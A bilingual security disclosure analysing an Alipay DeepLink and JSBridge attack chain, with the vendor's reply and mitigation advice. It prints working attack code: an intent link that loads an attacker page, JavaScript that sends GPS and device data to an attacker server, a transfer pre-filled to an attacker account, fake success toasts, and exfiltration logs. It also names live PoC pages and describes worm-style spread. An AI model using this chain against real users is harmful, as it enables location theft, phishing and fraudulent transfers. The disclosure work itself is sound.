针对支付宝 Android/iOS 最新版的 DeepLink + WebView JSBridge 攻击链端到端分析。已通过负责任披露流程向蚂蚁集团报告,厂商回复为"正常功能"。 End-to-end analysis of the DeepLink + WebView JSBridge attack chain on Alipay Android/iOS latest versions. Reported through responsible disclosure to Ant Group. Vendor response: "normal functionality."
读者请自行备份! Fork GitHub 仓库或保存网页到本地,防止任一节点被删除导致内容丢失。 Readers: please backup! Fork the GitHub repo or save this page locally to prevent content loss if any node is taken down.
| 项目Field | 值Value |
|---|---|
| Target | com.eg.android.AlipayGphone v10.8.26.7000 / v10.8.30.8000 |
| APK Size | 210.5 MB (220,503,494 bytes) |
| Platform | Android 16 (API 36) + iOS 26.3.1 |
| 分析日期Analysis Date | 2026-02-16 ~ 2026-03-07 |
| 攻击前提Prerequisites | 非Root、非越狱、无特殊权限、仅需受害者点击一个链接 No root, no jailbreak, no special permissions. Victim only needs to click one link. |
| 研究者Researcher | Innora AI Security Research (feng@innora.ai) |
我们始终遵循负责任的安全研究原则。在公开任何信息之前,已通过多个渠道向蚂蚁集团进行了完整的报告。
We followed responsible disclosure principles throughout. Before any public discussion, full reports were submitted to Ant Group through multiple channels.
开始对 Alipay v10.8.30.8000 APK 进行静态分析 Started static analysis of Alipay v10.8.30.8000 APK
第一次报告 — TLS/SSL 安全分析报告发送至 bin.z@antgroup.com, lingyan.wanglingya@antgroup.com, antsrc@service.alipay.com First Report — TLS/SSL security analysis sent to bin.z@antgroup.com, lingyan.wanglingya@antgroup.com, antsrc@service.alipay.com
综合安全分析完成,包含 SecurityGuard、BabaSSL、DexAOP 等模块的深度分析 Comprehensive analysis completed covering SecurityGuard, BabaSSL, DexAOP and more
第二次报告 — DeepLink + JSBridge 8个漏洞的完整攻击链报告发送至蚂蚁集团联系人 Second Report — Full DeepLink + JSBridge attack chain report (8 issues) sent to Ant Group contact
第三次报告 — V3增强版,17个漏洞 + 308条服务器日志 + 42张截图 Third Report — V3 enhanced, 17 issues + 308 server logs + 42 screenshots
第四次报告 — 端到端外部攻击报告,含Samsung S25 Ultra + iPhone 16 Pro跨平台验证 Fourth Report — E2E external attack report with cross-platform Samsung S25 Ultra + iPhone 16 Pro verification
测试账户被封锁(安全测试期间触发风控),发送账户解封申请 Test account banned (risk control triggered during testing). Account unblock request sent.
厂商回应:"正常功能" — 不认为是漏洞 Vendor Response: "Normal functionality" — not considered a vulnerability
公开发布 — 既然厂商确认这些都是"正常功能",那公开讨论"正常功能"的安全影响没有任何问题 Public Disclosure — Since the vendor confirmed these are "normal features," discussing the security implications of "normal features" publicly is entirely appropriate
支付宝的 alipays:// DeepLink scheme 允许任何第三方应用或网页将用户引导到支付宝的 Nebula WebView 容器,加载攻击者控制的外部网页。一旦加载,攻击者的 JavaScript 代码可以调用 AlipayJSBridge API,执行一系列危险操作:
攻击条件极低:受害者只需点击一个链接。无需Root、无需越狱、无需安装任何应用。链接可通过短信、微信、QQ、邮件、二维码等任何渠道传播。
Alipay's alipays:// DeepLink scheme allows any third-party app or webpage to direct users into Alipay's Nebula WebView container, loading attacker-controlled external web pages. Once loaded, the attacker's JavaScript can call AlipayJSBridge APIs to perform dangerous operations:
Attack prerequisites are minimal: victim only needs to click one link. No root, no jailbreak, no app installation required. The link can be distributed via SMS, WeChat, QQ, email, QR codes, or any other channel.
在任何公网 HTTPS 服务器上部署 PoC 页面(如 https://innora.ai/zfb/poc/verify.html)和数据收集端点
Deploy PoC page (e.g., https://innora.ai/zfb/poc/verify.html) and data collection endpoint on any public HTTPS server
通过短信/微信/QQ等发送链接。受害者在手机浏览器中点击后,看到"恭喜获得88元红包"等社工页面 Send link via SMS/WeChat/QQ. Victim clicks in mobile browser, sees social engineering page like "Congratulations! You won a ¥88 red packet"
intent://platformapi/startapp?appId=20000067&url=https%3A%2F%2Finnora.ai%2Fzfb%2Fpoc%2Fverify.html#Intent;scheme=alipays;package=com.eg.android.AlipayGphone;end
Chrome 通过 intent:// scheme 跳转到支付宝。支付宝 Nebula WebView 容器加载攻击者页面。AlipayJSBridge 被自动注入。显示一个"继续访问"警告(但未告知用户外部页面将获得 JSBridge API 权限)。
Chrome triggers Alipay via intent:// scheme. Alipay's Nebula WebView loads the attacker page. AlipayJSBridge is automatically injected. A "Continue to visit" warning appears (but does NOT inform the user that the external page will gain JSBridge API access).
攻击者 JS 调用 AlipayJSBridge API: Attacker JS calls AlipayJSBridge APIs:
// GPS 定位窃取
AlipayJSBridge.call("getLocation", {}, function(result) {
// result = {lat: 5.460012, lng: 100.314139, city: "槟城"}
exfiltrate("GPS", result); // POST to attacker server
});
// 打开转账页面,预填攻击者账号
AlipayJSBridge.call("startApp", {
appId: "09999988",
param: {
actionType: "toAccount",
account: "attacker@evil.com",
amount: "1000"
}
});
// 显示假转账通知
AlipayJSBridge.call("toast", {
content: "Transfer ¥5,000 to Zhang*Ming completed",
type: "success",
duration: 5000
});通过 XHR POST + Image Beacon 双通道将窃取的 GPS、设备信息、会话数据发送到攻击者服务器。308条完整日志记录在案。 GPS, device info, and session data sent to attacker server via dual-channel XHR POST + Image Beacon. 308 complete log entries recorded.
以下 DeepLink 从浏览器或任何第三方 APP 触发后,支付宝不显示任何额外警告,直接跳转到敏感功能页面:
The following DeepLinks, when triggered from a browser or any third-party app, cause Alipay to navigate without any additional warning directly to sensitive function pages:
| appId | 目标页面Target Page | 暴露数据Exposed Data |
|---|---|---|
20000003 |
交易记录Transaction History | 完整消费历史(商品名、金额、分类)Full spending history (items, amounts, categories) |
20000116 |
转账联系人Transfer Contacts | 20+ 联系人真实姓名、头像、转账金额20+ contacts' real names, avatars, transfer amounts |
20000123 |
收款二维码Payment QR Code | 完整收款码 + 真实姓名Full payment QR + real name |
20000032 |
余额宝Yu'E Bao (Money Market) | 余额 ¥5.00 + 累计收益 ¥9,453.67Balance ¥5.00 + total earnings ¥9,453.67 |
20000180 |
总资产Total Assets | 完整资产概览Complete asset overview |
20000153 |
芝麻信用Zhima Credit Score | 信用评分Credit score |
20000193 |
银行卡管理Bank Card Management | 绑定的银行卡信息Linked bank card info |
09999988 |
转账Transfer | 可预填攻击者收款账号和金额Can pre-fill attacker account and amount |
20000033 |
提现Withdrawal | 提现页面Withdrawal page |
20000221 |
亲情号Family Account | 亲情号列表Family account list |
68687023 |
花呗Huabei (Credit) | 花呗页面Credit page |
10000007 |
扫一扫Scan | 触发摄像头权限Triggers camera permission |
// From any app or browser:
Intent i = new Intent(Intent.ACTION_VIEW);
i.setData(Uri.parse("alipays://platformapi/startapp?appId=20000003"));
startActivity(i);
// Alipay opens transaction history directly. No warning.以下是可在线体验的 PoC 页面(已脱敏,不收集任何数据):
Below are live PoC pages you can test (sanitized, no data collection):
模拟攻击者通过短信/微信发送的钓鱼页面。在安装了支付宝的 Android 手机上用 Chrome 打开即可体验。 Simulates the phishing page an attacker would send via SMS/WeChat. Open in Chrome on an Android phone with Alipay installed.
在支付宝 WebView 中加载后,演示 AlipayJSBridge API 可以获取的所有数据。所有数据仅在本地显示,不发送到任何服务器。 When loaded inside Alipay WebView, demonstrates all data accessible via AlipayJSBridge APIs. All data is displayed locally only, not sent to any server.
alipays://platformapi/startapp?appId=20000067&url=https://innora.ai/zfb/poc/verify.html
证明通过 pushWindow 链式加载的页面同样获得完整 JSBridge 访问权限。 Proves that pages chain-loaded via pushWindow also receive full JSBridge access.
以下所有问题均在真实设备上端到端验证,有服务器日志和截图为证。我们对每个发现都标注了验证状态和证据类型。
All issues below were verified end-to-end on real devices, with server logs and screenshots as evidence. Each finding includes verification status and evidence type.
startApp API 允许外部页面打开支付宝转账页面,并预填收款账号和转账金额。受害者看到的是一个已经填好攻击者账号的转账界面。最终转账仍需用户点击确认按钮,但配合 UI 欺骗(V-08)和社会工程,用户误操作的风险极高。
The startApp API allows external pages to open Alipay's transfer page with pre-filled recipient account and amount. The victim sees a transfer form already populated with the attacker's account. Final transfer still requires user confirmation, but combined with UI spoofing (V-08) and social engineering, the risk of user error is extremely high.
{"tag":"f_startApp:转账预填(09999988)",
"data":{"status":"ok","result":{"success":true}}}API: AlipayJSBridge.call("startApp", {appId:"09999988", param:{actionType:"toAccount", account:"attacker@evil.com", amount:"1000"}})
pushWindow API 允许外部页面通过 alipays:// scheme 执行转账 DeepLink,传递攻击者账号和金额。
The pushWindow API allows external pages to execute transfer DeepLinks via the alipays:// scheme, passing attacker account and amount.
{"tag":"f_pushWindow:transfer_scheme",
"data":{"status":"ok","result":{"success":"true"}}}
外部页面可以通过 pushWindow 打开支付宝的支付收银台 URL。
External pages can open Alipay's payment cashier URL via pushWindow.
{"tag":"f_pushWindow:cashier(支付收银台)",
"data":{"status":"ok","result":{"success":"true"}}}
tradePay API 可以被外部页面调用,弹出支付宝支付界面。我们测试了3种参数格式,全部成功触发(resultCode=6001表示用户手动取消,但支付界面确实弹出了)。
The tradePay API can be called from external pages, launching the Alipay payment UI. We tested 3 parameter formats, all successfully triggered (resultCode=6001 means user manually cancelled, but the payment UI did appear).
{"tag":"f_tradePay:full_orderStr",
"data":{"status":"ok","result":{"resultCode":"6001"}}}外部页面中的 JavaScript 成功将 GPS 坐标、设备信息、网络信息、会话 ID 等数据通过 XHR POST + Image Beacon 双通道发送到攻击者服务器。总计 308 条完整日志记录。 JavaScript in external pages successfully exfiltrated GPS coordinates, device info, network info, session IDs via dual-channel XHR POST + Image Beacon to attacker server. Total: 308 complete log entries.
通过 startApp API,外部页面可以跳转到包括交易记录、银行卡管理、芝麻信用、提现、亲情号在内的 18 个敏感内部页面,全部返回 success: true。
Via the startApp API, external pages can navigate to 18 sensitive internal pages including transaction history, bank card management, credit score, withdrawal, and family accounts. All returned success: true.
getLocation API 在外部页面调用时,如果用户此前已授予支付宝位置权限,不显示任何二次确认弹窗,直接返回精确 GPS 坐标。已在 3 台设备上验证(新西兰 Android、马来西亚 Android、中国杭州 iOS)。注意 iOS 14+ 的模糊定位设置可能影响精度。
getLocation API when called from external pages, if the user has previously granted location permission to Alipay, shows no secondary consent dialog, directly returning precise GPS coordinates. Verified on 3 devices (New Zealand Android, Malaysia Android, Hangzhou China iOS). Note: iOS 14+ approximate location settings may affect precision.
// Samsung S25 Ultra — Auckland, New Zealand
{"lat": -36.707669, "lng": 174.719378, "city": "奥克兰", "country": "新西兰", "accuracy": 25}
// Redmi 23129RN51X — Penang, Malaysia
{"lat": 5.460012, "lng": 100.314139, "city": "槟城", "country": "马来西亚", "accuracy": 35}
// iPhone 16 Pro — Hangzhou, China
{"lat": 30.306882, "lng": 120.121303, "city": "杭州市"}攻击者可在支付宝内显示任意 toast 消息(如 "转账 ¥5,000 到 张*明 成功"),并将标题栏修改为 "安全中心" / "红包领取" 等钓鱼标题。配合社会工程,受害者无法区分真假。 Attacker can display arbitrary toast messages inside Alipay (e.g., "Transfer ¥5,000 to Zhang*Ming completed") and modify the title bar to "Security Center" / "Red Packet Claim." Combined with social engineering, victims cannot distinguish real from fake.
getAuthCode API 可被外部页面触发,发起 OAuth 服务端调用。虽然未成功获取授权码,但弹出了"服务忙,请稍后再试"弹窗,证明请求到达了 OAuth 服务端。
The getAuthCode API can be triggered by external pages, initiating OAuth server-side calls. While no auth code was obtained, a "Service busy, please try later" popup appeared, proving the request reached the OAuth server.
通过 DeepLink 直接打开余额宝页面,显示余额 ¥5.00 和累计收益 ¥9,453.67。转账联系人页面暴露 20+ 联系人完整真实姓名。无需任何额外确认。 DeepLink directly opens Yu'E Bao page showing balance ¥5.00 and total earnings ¥9,453.67. Transfer contacts page exposes 20+ contacts' full real names. No additional confirmation required.
| ID | 问题Issue | 严重度Severity | 验证Verified |
|---|---|---|---|
| V-01 | startApp 预填攻击者账号到转账页面startApp pre-fills attacker account on transfer page | CRIT | 308 logs |
| V-02 | pushWindow 执行转账 DeepLinkpushWindow executes transfer DeepLink | CRIT | 308 logs |
| V-03 | pushWindow 打开支付收银台pushWindow opens payment cashier | CRIT | 308 logs |
| V-04 | tradePay 触发支付 SDKtradePay triggers payment SDK | CRIT | 308 logs |
| V-05 | 完整数据外传链路Full data exfiltration chain | CRIT | 308 logs |
| V-06 | 18个敏感页面可跳转18 sensitive pages navigable | HIGH | 42 screenshots |
| V-07 | GPS 精确定位窃取GPS location theft | HIGH | 3 devices |
| V-08 | UI 欺骗 (toast + 标题篡改)UI spoofing (toast + title bar) | HIGH | 308 logs |
| V-09 | OAuth 授权流程劫持OAuth flow hijacking | HIGH | screenshot |
| V-10 | 余额宝余额 + 联系人姓名暴露Yu'E Bao balance + contact names exposed | HIGH | screenshot |
| V-11 | 收款二维码 + 真实姓名泄露Payment QR + real name exposure | HIGH | screenshot |
| V-12 | pushWindow 跳转登录页面 (钓鱼入口)pushWindow redirects to login page (phishing) | HIGH | screenshot |
| V-13 | 链式 WebView 攻击Chain WebView attack | HIGH | 308 logs |
| V-14 | 会话信息泄露Session info leakage | MED | 308 logs |
| V-15 | 完整设备指纹外传Full device fingerprint exfiltration | MED | 308 logs |
| V-16 | 网络信息泄露Network info leakage | MED | 308 logs |
| V-17 | API 权限地图泄露API permission map leakage | MED | 308 logs |
以下是攻击者服务器实际接收到的数据。这些日志记录在 innora.ai 上的数据收集端点,证明数据确实从支付宝 WebView 中外传到了外部服务器。
Below are actual data received by the attacker server. These logs were recorded at the data collection endpoint on innora.ai, proving data was indeed exfiltrated from Alipay WebView to an external server.
{
"timestamp": "2026-03-07 11:53:51.599",
"method": "POST",
"path": "/exfil",
"body": {
"tag": "getLocation:GPS location",
"data": {
"status": "ok",
"data": {
"accuracy": 35,
"city": "槟城",
"country": "马来西亚",
"latitude": 5.460012,
"longitude": 100.314139
}
}
}
}{
"tag": "getSystemInfo:Device info",
"data": {
"apiLevel": 36,
"app": "alipay",
"bluetoothEnabled": true,
"brand": "Redmi",
"cameraAuthorized": false,
"currentBattery": "100%",
"locationAuthorized": true,
"model": "Xiaomi 23129RN51X",
"platform": "Android",
"screenHeight": 1650,
"screenWidth": 720,
"storage": "119 GB",
"system": "16",
"version": "10.8.26.7000",
"wifiEnabled": true
}
}{
"tag": "getStartupParams",
"data": {
"sessionId": "session_20000067_22751",
"startFromExternal": "true",
"sourcePackageName": "com.android.chrome",
"safePayEnabled": "true",
"appId": "20000067",
"url": "http://192.168.80.12:8888/chain1.html"
}
}{"tag": "f_startApp:转账预填(09999988)", "data": {"status": "ok", "result": {"success": true}}}
{"tag": "f_pushWindow:transfer_scheme", "data": {"status": "ok", "result": {"success": "true"}}}
{"tag": "f_pushWindow:cashier(支付收银台)", "data": {"status": "ok", "result": {"success": "true"}}}
{"tag": "f_tradePay:full_orderStr", "data": {"status": "ok", "result": {"resultCode": "6001"}}}Mozilla/5.0 (Linux; Android 16; 23129RN51X Build/BP2A.250605.031.A3; wv)
AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0
Chrome/126.0.6478.122
NebulaSDK/1.8.100112 Nebula
AliApp(AP/10.8.26.7000) AlipayClient/10.8.26.7000
Language/zh-Hant Region/CN
User-Agent 中包含 NebulaSDK、AliApp(AP/10.8.26.7000)、AlipayClient — 这是支付宝 Nebula WebView 容器的独特标识,无法伪造。证明这些请求确实来自支付宝应用内部。
The User-Agent contains NebulaSDK, AliApp(AP/10.8.26.7000), AlipayClient — unique identifiers of the Alipay Nebula WebView container that cannot be forged. This proves these requests genuinely originated from within the Alipay app.
| 文件类型File Type | 数量Count | 描述Description |
|---|---|---|
| 设备截图Device Screenshots | 42 | 包含 CRITICAL 标签的 25 张 + 普通验证 17 张 25 with CRITICAL labels + 17 general verification |
| 服务器日志Server Logs | 308 entries | exfil_server_log_20260307_complete.jsonl (136 KB) exfil_server_log_20260307_complete.jsonl (136 KB) |
| PoC HTMLPoC HTML | 8 | chain1~chain8 攻击链 + trigger 触发页 chain1~chain8 attack chains + trigger page |
| 攻击服务器Attack Server | 1 | Python server.py (数据收集 + 日志记录) Python server.py (data collection + logging) |
| Nginx | 1 | nginx_exfil_access.log (52 KB) nginx_exfil_access.log (52 KB) |
所有攻击链在以下 3 台真实设备上独立验证成功,覆盖 Android 和 iOS 平台:
All attack chains were independently verified on 3 real devices across Android and iOS platforms:
iPhone 设备上的 API 权限比 Android 更宽松,攻击面更大:
API permissions on iPhone are more permissive than Android, creating a larger attack surface:
| API | Android | iOS | 风险Risk |
|---|---|---|---|
tradePay |
不可用N/A | 可用Available | 触发支付 SDKTriggers payment SDK |
share |
不可用N/A | 可用Available | 蠕虫传播向量 — 自动分享恶意链接到微信/QQ Worm propagation vector — auto-share malicious links to WeChat/QQ |
scan |
不可用N/A | 可用Available | 打开摄像头Opens camera |
chooseImage |
不可用N/A | 可用Available | 访问相册Access photo library |
getLocation |
checkJSAPI 不可用checkJSAPI N/A | 可用Available | 定位窃取Location theft |
蠕虫风险:iOS 上的 share API 意味着攻击者页面可以自动将恶意链接分享到微信、QQ、短信、钉钉等平台,实现自我传播。一个受害者点击链接 → 恶意链接自动分享给其联系人 → 指数级传播。
Worm Risk: The share API on iOS means the attacker page can automatically share the malicious link to WeChat, QQ, SMS, DingTalk, etc. One victim clicks → malicious link auto-shared to contacts → exponential propagation.
客观地说,支付宝的安全架构确实有部分防护措施正在生效。以下 API 在外部域名下被正确拦截(返回 permission denied):
To be objective, Alipay's security architecture does have some working defensive measures. The following APIs are correctly blocked from external domains (returning permission denied):
clipboard 读写read/writegetUserInforpc (后端 RPC 调用backend RPC calls)httpRequest (bridge-level)openInBrowsersendSMS (实际发送被拦截actual sending blocked)makePhoneCall这说明支付宝有能力在 JSBridge 层面实施域名白名单和权限控制。上述 17 个问题中涉及的 API 只是还没有被加入到同样的权限控制机制中。
This demonstrates that Alipay has the capability to implement domain whitelisting and permission controls at the JSBridge level. The APIs involved in the 17 issues above simply haven't been added to the same permission control mechanism yet.
蚂蚁集团的回应(2026-03-10):所报告的内容是"支付宝的正常功能",不认为是安全漏洞。 Ant Group's Response (2026-03-10): The reported issues are "normal functionality of Alipay," not considered security vulnerabilities.
我们充分尊重厂商的判断。但以下事实不会因为判定结论而改变:
startApp 返回 success: true,转账页面确实打开了,攻击者的账号确实被预填了。这个事实不受"是否是漏洞"的判定影响。clipboard 和 getUserInfo 被正确拦截了,那 getLocation 和 startApp 为什么不需要同样的保护?同一个安全框架对不同API的处理方式不一致,这至少说明有改进空间。我们发表这篇技术分析,不是为了争论"是不是漏洞"。我们只是在公开描述一个事实:攻击者可以通过一个链接,在不需要用户理解其后果的情况下,从支付宝中获取GPS定位、打开转账页面、显示假通知。读者可以自行判断这是否是一个值得关注的安全问题。
重要澄清:本文所有描述的攻击链均无法实现"零交互自动转账/扣款"。转账操作最终仍需用户主动点击确认按钮。我们讨论的核心风险是:在UI欺骗 + 社会工程 + 预填信息的组合攻击下,用户做出错误操作的概率被大幅提高。我们严格区分"页面成功跳转"和"资金操作完成",不做任何夸大。
We fully respect the vendor's judgment. However, the following facts do not change based on the classification decision:
startApp returned success: true, the transfer page opened, and the attacker's account was pre-filled. This fact is independent of the classification.clipboard and getUserInfo are correctly blocked, why don't getLocation and startApp receive the same protection? The inconsistent treatment of different APIs within the same security framework at minimum indicates room for improvement.We publish this technical analysis not to argue about whether something is a "vulnerability." We are simply publicly describing a fact: an attacker can, through a single link, obtain GPS location from Alipay, open transfer pages, and display fake notifications — without the user understanding the consequences. Readers can judge for themselves whether this is a security concern worth attention.
Important Clarification: None of the attack chains described in this article can achieve "zero-interaction automatic transfers/debits." Fund transfers still require the user to actively tap the confirmation button. The core risk we discuss is: under the combined attack of UI spoofing + social engineering + pre-filled information, the probability of users making erroneous operations is significantly increased. We strictly distinguish between "page navigation succeeded" and "fund operation completed," and make no exaggerations.
尽管厂商将这些归类为"正常功能",我们仍然提供以下技术建议以供参考:
Despite the vendor classifying these as "normal features," we still offer the following technical recommendations for consideration:
| # | 建议Recommendation | 覆盖问题Addresses |
|---|---|---|
| 1 |
JSBridge 域名白名单:非阿里巴巴域名禁止调用 startApp、pushWindow、tradePay、getLocation
JSBridge domain whitelist: Block startApp, pushWindow, tradePay, getLocation for non-Alibaba domains
|
V-01~V-07 |
| 2 |
startApp 参数过滤:外部页面调用 startApp 时禁止传递 param(预填账号/金额)
startApp parameter filtering: Block param passing (pre-fill account/amount) when called from external pages
|
V-01, V-02 |
| 3 |
pushWindow URL 限制:禁止 pushWindow 加载 alipays:// scheme 和内部 URL
pushWindow URL restriction: Block pushWindow from loading alipays:// schemes and internal URLs
|
V-02, V-03, V-12 |
| 4 |
tradePay 来源校验:tradePay 必须验证调用来源为受信任的 H5 应用
tradePay source validation: tradePay must verify calling source is a trusted H5 app
|
V-04 |
| 5 | getLocation 权限弹窗:外部页面调用时必须显示用户确认弹窗 getLocation permission dialog: Must show user consent dialog when called from external pages | V-07 |
| 6 | DeepLink 敏感页面保护:敏感功能的 DeepLink 需验证调用来源或要求二次确认 DeepLink sensitive page protection: Sensitive function DeepLinks should verify calling source or require secondary confirmation | V-06, V-10, V-11 |
| 7 |
UI 欺骗防护:外部页面禁止调用 toast、setTitle
UI spoofing protection: Block toast, setTitle from external pages
|
V-08 |
| 8 | "继续访问"警告增强:明确告知用户外部页面将获得的 API 权限 Enhanced "Continue" warning: Explicitly inform users of the API permissions the external page will gain | All |
| 9 | 数据外传防护:WebView 内 XHR/Image 请求检查目标域名 Data exfiltration prevention: Check target domain for XHR/Image requests within WebView | V-05, V-15~V-17 |
如果蚂蚁集团在阅读本文后希望进一步沟通、请求澄清或要求更新特定内容,请发送邮件至 feng@innora.ai。如果相关问题在后续版本中得到修复,我们将及时更新本文并标注修复状态。
如果其他安全研究人员对本文中的技术分析有疑问或想要交流,同样欢迎联系。
If Ant Group wishes to discuss further, request clarification, or ask for specific content updates after reading this article, please email feng@innora.ai. If the issues discussed here are addressed in future versions, we will promptly update this article with the fix status.
Other security researchers with questions about the technical analysis or who wish to exchange findings are also welcome to reach out.
请 Fork / 下载备份。如发现任一地址不可访问,请从其他节点获取完整内容。 Please Fork / download as backup. If any mirror becomes unavailable, access the full content from other nodes.